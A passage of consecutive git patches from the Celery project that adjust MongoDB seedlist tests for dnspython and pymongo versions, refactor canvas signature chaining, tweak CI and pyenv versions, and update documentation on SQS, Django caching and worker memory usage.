from kombu.exceptions import EncodeError
@@ -152,9 +153,11 @@ def test_init_with_settings(self):
mb = MongoBackend(app=self.app, url='mongodb://')
@pytest.mark.skipif(dns.version.MAJOR > 1,
- reason="For dnspython version >= 2, pymongo's"
+ reason="For dnspython version > 1, pymongo's"
"srv_resolver calls resolver.resolve")
- def test_init_mongodb_dnspython1_seedlist(self):
+ @pytest.mark.skipif(pymongo.version_tuple[0] > 3,
+ reason="For pymongo version > 3, options returns ssl")
+ def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
resolver = fake_resolver()
self.app.conf.mongodb_backend_settings = None
@@ -169,7 +172,43 @@ def test_init_mongodb_dnspython1_seedlist(self):
@pytest.mark.skipif(dns.version.MAJOR <= 1,
reason="For dnspython versions 1.X, pymongo's"
"srv_resolver calls resolver.query")
- def test_init_mongodb_dnspython2_seedlist(self):
+ @pytest.mark.skipif(pymongo.version_tuple[0] > 3,
+ reason="For pymongo version > 3, options returns ssl")
+ def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
+ resolver = fake_resolver()
+ self.app.conf.mongodb_backend_settings = None
+
+ with patch('dns.resolver.resolve', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
+ assert mb.options == dict(
+ mb._prepare_client_options(),
+ replicaset='rs0',
+ ssl=True
+ )
+
+ @pytest.mark.skipif(dns.version.MAJOR > 1,
+ reason="For dnspython version >= 2, pymongo's"
+ "srv_resolver calls resolver.resolve")
+ @pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
+ reason="For pymongo version > 3, options returns tls")
+ def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
+ resolver = fake_resolver()
+ self.app.conf.mongodb_backend_settings = None
+
+ with patch('dns.resolver.query', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
+ assert mb.options == dict(
+ mb._prepare_client_options(),
+ replicaset='rs0',
+ tls=True
+ )
+
+ @pytest.mark.skipif(dns.version.MAJOR <= 1,
+ reason="For dnspython versions 1.X, pymongo's"
+ "srv_resolver calls resolver.query")
+ @pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
+ reason="For pymongo version > 3, options returns tls")
+ def test_init_mongodb_dnspython2_pymongo4_seedlist(self):
resolver = fake_resolver()
self.app.conf.mongodb_backend_settings = None
From ab20d937b32fba65d8902c9d5c2a2849b02898f6 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 19:43:33 +0200
Subject: [PATCH 154/177] Fix fake resolver for dnspython version 2, pymongo
version 4
---
requirements/extras/couchbase.txt | 2 +-
t/unit/backends/test_mongodb.py | 23 ++++++++++++++++++++++-
2 files changed, 23 insertions(+), 2 deletions(-)
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index a736d6a7742..b99329bf1ef 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
\ No newline at end of file
+# couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index f93107d76c8..19617559242 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -64,6 +64,27 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
return mock_resolver
+def fake_resolver_dnspython2():
+ Name = pytest.importorskip('dns.name').Name
+ TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
+ SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
+
+ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
+
+ if rdtype == 'SRV':
+ return [
+ SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
+ for hostname in [
+ 'mongo1.example.com'.split('.'),
+ 'mongo2.example.com'.split('.'),
+ 'mongo3.example.com'.split('.')
+ ]
+ ]
+ elif rdtype == 'TXT':
+ return [TXT(0, 0, [b'replicaSet=rs0'])]
+
+ return mock_resolver
+
class test_MongoBackend:
default_url = 'mongodb://uuuu:pwpw@hostname.dom/database'
replica_set_url = (
@@ -209,7 +230,7 @@ def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython2_pymongo4_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython2()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
From 6a25b0ec6953adef7d3cba4eb1a536abb1831a15 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 20:35:57 +0200
Subject: [PATCH 155/177] Refactor fake resolver for dnspython2.
---
t/unit/backends/test_mongodb.py | 20 +++++++++++---------
1 file changed, 11 insertions(+), 9 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 19617559242..ec9496b7ea9 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -43,7 +43,8 @@
pytest.importorskip('pymongo')
-def fake_resolver():
+
+def fake_resolver_dnspython1():
Name = pytest.importorskip('dns.name').Name
TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
@@ -64,8 +65,9 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
return mock_resolver
+
def fake_resolver_dnspython2():
- Name = pytest.importorskip('dns.name').Name
+ name_from_text = pytest.importorskip('dns.name').from_text
TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
@@ -73,11 +75,11 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
if rdtype == 'SRV':
return [
- SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
+ SRV(0, 0, 0, 0, 27017, name_from_text(hostname))
for hostname in [
- 'mongo1.example.com'.split('.'),
- 'mongo2.example.com'.split('.'),
- 'mongo3.example.com'.split('.')
+ 'mongo1.example.com',
+ 'mongo2.example.com',
+ 'mongo3.example.com'
]
]
elif rdtype == 'TXT':
@@ -179,7 +181,7 @@ def test_init_with_settings(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython1()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
@@ -196,7 +198,7 @@ def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython1()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
@@ -213,7 +215,7 @@ def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython1()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
From 9a4e0ec0144b8dfb85cd8e8954d842830a38e569 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 20:49:09 +0200
Subject: [PATCH 156/177] restore couchbase dep
---
requirements/extras/couchbase.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index b99329bf1ef..a86b71297ab 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-# couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
From 113533c6e85340f3da8bdcae618e091295e6ce87 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 20:56:57 +0200
Subject: [PATCH 157/177] Try to use a str object. (#7131)
---
t/unit/backends/test_mongodb.py | 35 ++++++---------------------------
1 file changed, 6 insertions(+), 29 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index ec9496b7ea9..0725d04629b 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -44,8 +44,7 @@
pytest.importorskip('pymongo')
-def fake_resolver_dnspython1():
- Name = pytest.importorskip('dns.name').Name
+def fake_resolver_dnspython():
TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
@@ -53,29 +52,7 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
if rdtype == 'SRV':
return [
- SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
- for hostname in [
- b'mongo1.example.com'.split(b'.'),
- b'mongo2.example.com'.split(b'.'),
- b'mongo3.example.com'.split(b'.')
- ]
- ]
- elif rdtype == 'TXT':
- return [TXT(0, 0, [b'replicaSet=rs0'])]
-
- return mock_resolver
-
-
-def fake_resolver_dnspython2():
- name_from_text = pytest.importorskip('dns.name').from_text
- TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
- SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
-
- def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
-
- if rdtype == 'SRV':
- return [
- SRV(0, 0, 0, 0, 27017, name_from_text(hostname))
+ SRV(0, 0, 0, 0, 27017, hostname)
for hostname in [
'mongo1.example.com',
'mongo2.example.com',
@@ -181,7 +158,7 @@ def test_init_with_settings(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
- resolver = fake_resolver_dnspython1()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
@@ -198,7 +175,7 @@ def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
- resolver = fake_resolver_dnspython1()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
@@ -215,7 +192,7 @@ def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
- resolver = fake_resolver_dnspython1()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
@@ -232,7 +209,7 @@ def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython2_pymongo4_seedlist(self):
- resolver = fake_resolver_dnspython2()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
From 1814e03a87962d2fe7237532c90d03e9c7ffd331 Mon Sep 17 00:00:00 2001
From: Karol Alvarado <33376742+Koressi@users.noreply.github.com>
Date: Mon, 6 Dec 2021 06:01:02 +0100
Subject: [PATCH 158/177] Add missing space. (#7133)
---
celery/bin/worker.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index 16fffcc794d..f0629fcaf52 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -182,7 +182,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
value: value or ctx.obj.app.conf.worker_prefetch_multiplier,
cls=CeleryOption,
help_group="Worker Options",
- help="Set custom prefetch multiplier value"
+ help="Set custom prefetch multiplier value "
"for this worker instance.")
@click.option('-c',
'--concurrency',
From 6fb4f9f62801ce33dd4dc95f79d53893d6e35208 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Mon, 6 Dec 2021 21:02:51 +0200
Subject: [PATCH 159/177] Exclude pypy-windows checks from CI temporarily
(#7146)
* Fix flake8 error.
* Exclude pypy-windows checks from CI temporarily
---
.github/workflows/python-package.yml | 6 +++++-
t/unit/backends/test_mongodb.py | 19 ++++++++++---------
2 files changed, 15 insertions(+), 10 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 575650afff1..bb2ed26d003 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -28,7 +28,11 @@ jobs:
matrix:
python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7', 'pypy-3.8']
os: ["ubuntu-20.04", "windows-latest"]
-
+ exclude:
+ - python-version: 'pypy-3.7'
+ os: "windows-latest"
+ - python-version: 'pypy-3.8'
+ os: "windows-latest"
steps:
- name: Install apt packages
if: startsWith(matrix.os, 'ubuntu-')
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 0725d04629b..c15ded834f1 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -29,14 +29,14 @@
MONGODB_GROUP_COLLECTION = 'group_collection1'
# uri with user, password, database name, replica set, DNS seedlist format
MONGODB_SEEDLIST_URI = ('srv://'
- 'celeryuser:celerypassword@'
- 'dns-seedlist-host.example.com/'
- 'celerydatabase')
+ 'celeryuser:celerypassword@'
+ 'dns-seedlist-host.example.com/'
+ 'celerydatabase')
MONGODB_BACKEND_HOST = [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ 'mongo1.example.com:27017',
+ 'mongo2.example.com:27017',
+ 'mongo3.example.com:27017',
+]
CELERY_USER = 'celeryuser'
CELERY_PASSWORD = 'celerypassword'
CELERY_DATABASE = 'celerydatabase'
@@ -64,6 +64,7 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
return mock_resolver
+
class test_MongoBackend:
default_url = 'mongodb://uuuu:pwpw@hostname.dom/database'
replica_set_url = (
@@ -235,7 +236,7 @@ def test_ensure_mongodb_uri_compliance(self):
assert compliant_uri('mongodb://') == 'mongodb://localhost'
assert compliant_uri('mongodb+something://host') == \
- 'mongodb+something://host'
+ 'mongodb+something://host'
assert compliant_uri('something://host') == 'mongodb+something://host'
@@ -694,7 +695,7 @@ def find_one(self, task_id):
@pytest.mark.parametrize("serializer,result_type,result", [
(s, type(i['result']), i['result']) for i in SUCCESS_RESULT_TEST_DATA
for s in i['serializers']]
- )
+ )
def test_encode_success_results(self, mongo_backend_factory, serializer,
result_type, result):
backend = mongo_backend_factory(serializer=serializer)
From 8ba6f7438b8b4fc10531f37cf550526fe8fb7922 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Viktor=20K=C3=A1lm=C3=A1n?=
Date: Fri, 10 Dec 2021 12:44:47 +0100
Subject: [PATCH 160/177] update doc to reflect Celery 5.2.x (#7153)
* update doc to reflect Celery 5.2.x
* Mention 3.10 as well.
Co-authored-by: Asif Saif Uddin
* Fix formatting.
* update
Co-authored-by: Omer Katz
Co-authored-by: Asif Saif Uddin
---
docs/getting-started/introduction.rst | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/docs/getting-started/introduction.rst b/docs/getting-started/introduction.rst
index a57086df8bc..2797ce60097 100644
--- a/docs/getting-started/introduction.rst
+++ b/docs/getting-started/introduction.rst
@@ -39,14 +39,15 @@ What do I need?
===============
.. sidebar:: Version Requirements
- :subtitle: Celery version 5.1 runs on
+ :subtitle: Celery version 5.2 runs on
- - Python ❨3.6, 3.7, 3.8❩
- - PyPy3.6 ❨7.3❩
+ - Python ❨3.7, 3.8, 3.9, 3.10❩
+ - PyPy3.7, 3.8 ❨7.3.7❩
Celery 4.x was the last version to support Python 2.7,
Celery 5.x requires Python 3.6 or newer.
Celery 5.1.x also requires Python 3.6 or newer.
+ Celery 5.2.x requires Python 3.7 or newer.
If you're running an older version of Python, you need to be running
From 9c06002f8c63ae9cb4a9cfffff356f5eccd73dfb Mon Sep 17 00:00:00 2001
From: Ava Thorn
Date: Sun, 12 Dec 2021 06:15:29 -0500
Subject: [PATCH 161/177] Update configuration.rst
Fix typo causing syntax error in documentation
---
docs/userguide/configuration.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 0d7d7554d0a..52797df39fe 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -2182,7 +2182,7 @@ Examples:
},
}
- task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default})
+ task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default'})
Where ``myapp.tasks.route_task`` could be:
From 314a70498b164fbfdc5805ae31e4d91be9931b8b Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 14 Dec 2021 21:00:56 +0600
Subject: [PATCH 162/177] bump python 3.10.1 in pyenv
---
docker/scripts/install-pyenv.sh | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docker/scripts/install-pyenv.sh b/docker/scripts/install-pyenv.sh
index dcf5f2a6d63..76a127ed35f 100644
--- a/docker/scripts/install-pyenv.sh
+++ b/docker/scripts/install-pyenv.sh
@@ -7,7 +7,7 @@ curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv
git clone https://github.com/s1341/pyenv-alias.git $(pyenv root)/plugins/pyenv-alias
# Python versions to test against
-VERSION_ALIAS="python3.10" pyenv install 3.10.0
+VERSION_ALIAS="python3.10" pyenv install 3.10.1
VERSION_ALIAS="python3.7" pyenv install 3.7.12
VERSION_ALIAS="python3.8" pyenv install 3.8.12
VERSION_ALIAS="python3.9" pyenv install 3.9.9
From 0442761fb6b4d7cef82b49f9f302821576365b5a Mon Sep 17 00:00:00 2001
From: n0061q <95093640+n0061q@users.noreply.github.com>
Date: Tue, 14 Dec 2021 18:10:21 +0200
Subject: [PATCH 163/177] Docs for SQS: setting additional message properties
(#7167)
* fix code block formatting
* SQS docs - additional message properties
---
docs/getting-started/backends-and-brokers/sqs.rst | 15 ++++++++++++++-
1 file changed, 14 insertions(+), 1 deletion(-)
diff --git a/docs/getting-started/backends-and-brokers/sqs.rst b/docs/getting-started/backends-and-brokers/sqs.rst
index cd8fd2a3b33..f7ea2fe3ac8 100644
--- a/docs/getting-started/backends-and-brokers/sqs.rst
+++ b/docs/getting-started/backends-and-brokers/sqs.rst
@@ -198,7 +198,7 @@ STS token authentication
https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html
AWS STS authentication is supported by using the ``sts_role_arn`` and ``sts_token_timeout`` broker transport options. ``sts_role_arn`` is the assumed IAM role ARN we use to authorize our access to SQS.
-``sts_token_timeout`` is the token timeout, defaults (and minimum) to 900 seconds. After the mentioned period, a new token will be created.
+``sts_token_timeout`` is the token timeout, defaults (and minimum) to 900 seconds. After the mentioned period, a new token will be created::
broker_transport_options = {
'predefined_queues': {
@@ -249,6 +249,19 @@ Caveats
:program:`celery events`, :program:`celerymon`, or the Django Admin
monitor.
+- With FIFO queues it might be necessary to set additional message properties such as ``MessageGroupId`` and ``MessageDeduplicationId`` when publishing a message.
+
+ Message properties can be passed as keyword arguments to :meth:`~celery.app.task.Task.apply_async`:
+
+ .. code-block:: python
+
+ message_properties = {
+ 'MessageGroupId': '',
+ 'MessageDeduplicationId': ''
+ }
+ task.apply_async(**message_properties)
+
+
.. _sqs-results-configuration:
Results
From cbdebaec1cb6907f4223ba46b31e02640f3846c2 Mon Sep 17 00:00:00 2001
From: Skonik
Date: Thu, 16 Dec 2021 11:50:34 +0300
Subject: [PATCH 164/177] docs: add sqs broker url setup warning
---
.../backends-and-brokers/sqs.rst | 17 ++++++++++++++---
1 file changed, 14 insertions(+), 3 deletions(-)
diff --git a/docs/getting-started/backends-and-brokers/sqs.rst b/docs/getting-started/backends-and-brokers/sqs.rst
index f7ea2fe3ac8..ae5e2ff9d17 100644
--- a/docs/getting-started/backends-and-brokers/sqs.rst
+++ b/docs/getting-started/backends-and-brokers/sqs.rst
@@ -38,14 +38,25 @@ encode the password so it can always be parsed correctly. For example:
.. code-block:: python
from kombu.utils.url import safequote
-
+
aws_access_key = safequote("ABCDEFGHIJKLMNOPQRST")
aws_secret_key = safequote("ZYXK7NiynG/TogH8Nj+P9nlE73sq3")
-
+
broker_url = "sqs://{aws_access_key}:{aws_secret_key}@".format(
aws_access_key=aws_access_key, aws_secret_key=aws_secret_key,
)
+.. warning::
+
+ Don't use this setup option with django's ``debug=True``.
+ It may lead to security issues within deployed django apps.
+
+ In debug mode django shows environment variables and the SQS URL
+ may be exposed to the internet including your AWS access and secret keys.
+ Please turn off debug mode on your deployed django application or
+ consider a setup option described below.
+
+
The login credentials can also be set using the environment variables
:envvar:`AWS_ACCESS_KEY_ID` and :envvar:`AWS_SECRET_ACCESS_KEY`,
in that case the broker URL may only be ``sqs://``.
@@ -252,7 +263,7 @@ Caveats
- With FIFO queues it might be necessary to set additional message properties such as ``MessageGroupId`` and ``MessageDeduplicationId`` when publishing a message.
Message properties can be passed as keyword arguments to :meth:`~celery.app.task.Task.apply_async`:
-
+
.. code-block:: python
message_properties = {
From 83869da17d4214014f41b6e57271de23f808f1f8 Mon Sep 17 00:00:00 2001
From: Laszlo
Date: Sat, 18 Dec 2021 05:13:06 +0100
Subject: [PATCH 165/177] Split Signature.__or__ into subclasses' __or__
(#7135)
* move group | signature
* reorder conditions
* move chain | group
* reorder conditions
* reorder conditions
* move chain | chain
* reorder conditions
* move chord | task (if task is neither group nor chain)
* reorder conditions
* reorder conditions
* move chain | not-group-or-chain
* reorder conditions
* fix: chord | non-signature
* remove obsolete comment
* test: chord | chain and chord | group
Co-authored-by: Laszlo Treszkai
Co-authored-by: Laszlo Treszkai
---
celery/canvas.py | 95 ++++++++++++++++++++-----------------
t/unit/tasks/test_canvas.py | 21 ++++++++
2 files changed, 73 insertions(+), 43 deletions(-)
diff --git a/celery/canvas.py b/celery/canvas.py
index f0bcd2c5260..e0b55389288 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -394,55 +394,16 @@ def flatten_links(self):
)))
def __or__(self, other):
- # These could be implemented in each individual class,
- # I'm sure, but for now we have this.
- if isinstance(self, group):
- # group() | task -> chord
- return chord(self, body=other, app=self._app)
+ if isinstance(other, _chain):
+ # task | chain -> chain
+ return _chain(seq_concat_seq(
+ (self,), other.unchain_tasks()), app=self._app)
elif isinstance(other, group):
# unroll group with one member
other = maybe_unroll_group(other)
- if isinstance(self, _chain):
- # chain | group() -> chain
- tasks = self.unchain_tasks()
- if not tasks:
- # If the chain is empty, return the group
- return other
- return _chain(seq_concat_item(
- tasks, other), app=self._app)
# task | group() -> chain
return _chain(self, other, app=self.app)
-
- if not isinstance(self, _chain) and isinstance(other, _chain):
- # task | chain -> chain
- return _chain(seq_concat_seq(
- (self,), other.unchain_tasks()), app=self._app)
- elif isinstance(other, _chain):
- # chain | chain -> chain
- return _chain(seq_concat_seq(
- self.unchain_tasks(), other.unchain_tasks()), app=self._app)
- elif isinstance(self, chord):
- # chord | task -> attach to body
- sig = self.clone()
- sig.body = sig.body | other
- return sig
elif isinstance(other, Signature):
- if isinstance(self, _chain):
- if self.tasks and isinstance(self.tasks[-1], group):
- # CHAIN [last item is group] | TASK -> chord
- sig = self.clone()
- sig.tasks[-1] = chord(
- sig.tasks[-1], other, app=self._app)
- return sig
- elif self.tasks and isinstance(self.tasks[-1], chord):
- # CHAIN [last item is chord] -> chain with chord body.
- sig = self.clone()
- sig.tasks[-1].body = sig.tasks[-1].body | other
- return sig
- else:
- # chain | task -> chain
- return _chain(seq_concat_item(
- self.unchain_tasks(), other), app=self._app)
# task | task -> chain
return _chain(self, other, app=self._app)
return NotImplemented
@@ -613,6 +574,40 @@ def __call__(self, *args, **kwargs):
if self.tasks:
return self.apply_async(args, kwargs)
+ def __or__(self, other):
+ if isinstance(other, group):
+ # unroll group with one member
+ other = maybe_unroll_group(other)
+ # chain | group() -> chain
+ tasks = self.unchain_tasks()
+ if not tasks:
+ # If the chain is empty, return the group
+ return other
+ return _chain(seq_concat_item(
+ tasks, other), app=self._app)
+ elif isinstance(other, _chain):
+ # chain | chain -> chain
+ return _chain(seq_concat_seq(
+ self.unchain_tasks(), other.unchain_tasks()), app=self._app)
+ elif isinstance(other, Signature):
+ if self.tasks and isinstance(self.tasks[-1], group):
+ # CHAIN [last item is group] | TASK -> chord
+ sig = self.clone()
+ sig.tasks[-1] = chord(
+ sig.tasks[-1], other, app=self._app)
+ return sig
+ elif self.tasks and isinstance(self.tasks[-1], chord):
+ # CHAIN [last item is chord] -> chain with chord body.
+ sig = self.clone()
+ sig.tasks[-1].body = sig.tasks[-1].body | other
+ return sig
+ else:
+ # chain | task -> chain
+ return _chain(seq_concat_item(
+ self.unchain_tasks(), other), app=self._app)
+ else:
+ return NotImplemented
+
def clone(self, *args, **kwargs):
to_signature = maybe_signature
signature = super().clone(*args, **kwargs)
@@ -1071,6 +1066,10 @@ def __init__(self, *tasks, **options):
def __call__(self, *partial_args, **options):
return self.apply_async(partial_args, **options)
+ def __or__(self, other):
+ # group() | task -> chord
+ return chord(self, body=other, app=self._app)
+
def skew(self, start=1.0, stop=None, step=1.0):
it = fxrange(start, stop, step, repeatlast=True)
for task in self.tasks:
@@ -1377,6 +1376,16 @@ def __init__(self, header, body=None, task='celery.chord',
def __call__(self, body=None, **options):
return self.apply_async((), {'body': body} if body else {}, **options)
+ def __or__(self, other):
+ if (not isinstance(other, (group, _chain)) and
+ isinstance(other, Signature)):
+ # chord | task -> attach to body
+ sig = self.clone()
+ sig.body = sig.body | other
+ return sig
+ else:
+ return super().__or__(other)
+
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None, group_index=None):
# pylint: disable=redefined-outer-name
diff --git a/t/unit/tasks/test_canvas.py b/t/unit/tasks/test_canvas.py
index ca2d0384257..bf9e60599c5 100644
--- a/t/unit/tasks/test_canvas.py
+++ b/t/unit/tasks/test_canvas.py
@@ -402,6 +402,27 @@ def test_group_to_chord__protocol_2(self):
tasks2, _ = c2.prepare_steps((), {}, c2.tasks)
assert isinstance(tasks2[0], group)
+ def test_chord_to_chain(self):
+ c = (
+ chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')],
+ self.add.s(['foo'])) |
+ chain(self.add.s(['y']), self.add.s(['z']))
+ )
+ assert isinstance(c, _chain)
+ assert c.apply().get() == ['x0y0', 'x1y1', 'foo', 'y', 'z']
+
+ def test_chord_to_group(self):
+ c = (
+ chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')],
+ self.add.s(['foo'])) |
+ group([self.add.s(['y']), self.add.s(['z'])])
+ )
+ assert isinstance(c, _chain)
+ assert c.apply().get() == [
+ ['x0y0', 'x1y1', 'foo', 'y'],
+ ['x0y0', 'x1y1', 'foo', 'z']
+ ]
+
def test_apply_options(self):
class static(Signature):
From 843396e956b21f8815f1a4a71d347ba45a1008e6 Mon Sep 17 00:00:00 2001
From: Sadegh
Date: Wed, 22 Dec 2021 21:41:50 +0100
Subject: [PATCH 166/177] Fix typo in documentation
`CELERY_CACHE_BACKEND` is the right property for cache backend, not `CELERY_RESULT_BACKEND`
---
docs/django/first-steps-with-django.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/django/first-steps-with-django.rst b/docs/django/first-steps-with-django.rst
index 2b402c8a505..9c9a2f5bc8f 100644
--- a/docs/django/first-steps-with-django.rst
+++ b/docs/django/first-steps-with-django.rst
@@ -201,7 +201,7 @@ To use this with your project you need to follow these steps:
.. code-block:: python
- CELERY_RESULT_BACKEND = 'django-cache'
+ CELERY_CACHE_BACKEND = 'django-cache'
We can also use the cache defined in the CACHES setting in django.
From c506f45926b40c041bfbe5147e3a3e59a9751435 Mon Sep 17 00:00:00 2001
From: Paul Brown
Date: Sat, 25 Dec 2021 07:27:53 +0000
Subject: [PATCH 167/177] add memory usage section to optimizing docs (#7186)
* add memory usage section to optimizing docs
* add example of too low max tasks per child
---
docs/userguide/optimizing.rst | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
diff --git a/docs/userguide/optimizing.rst b/docs/userguide/optimizing.rst
index ab293e67bce..4372f3af199 100644
--- a/docs/userguide/optimizing.rst
+++ b/docs/userguide/optimizing.rst
@@ -179,6 +179,38 @@ You can enable this behavior by using the following configuration options:
task_acks_late = True
worker_prefetch_multiplier = 1
+Memory Usage
+------------
+
+If you are experiencing high memory usage on a prefork worker, first you need
+to determine whether the issue is also happening on the Celery master
+process. The Celery master process's memory usage should not continue to
+increase drastically after start-up. If you see this happening, it may indicate
+a memory leak bug which should be reported to the Celery issue tracker.
+
+If only your child processes have high memory usage, this indicates an issue
+with your task.
+
+Keep in mind, Python process memory usage has a "high watermark" and will not
+return memory to the operating system until the child process has stopped. This
+means a single high memory usage task could permanently increase the memory
+usage of a child process until it's restarted. Fixing this may require adding
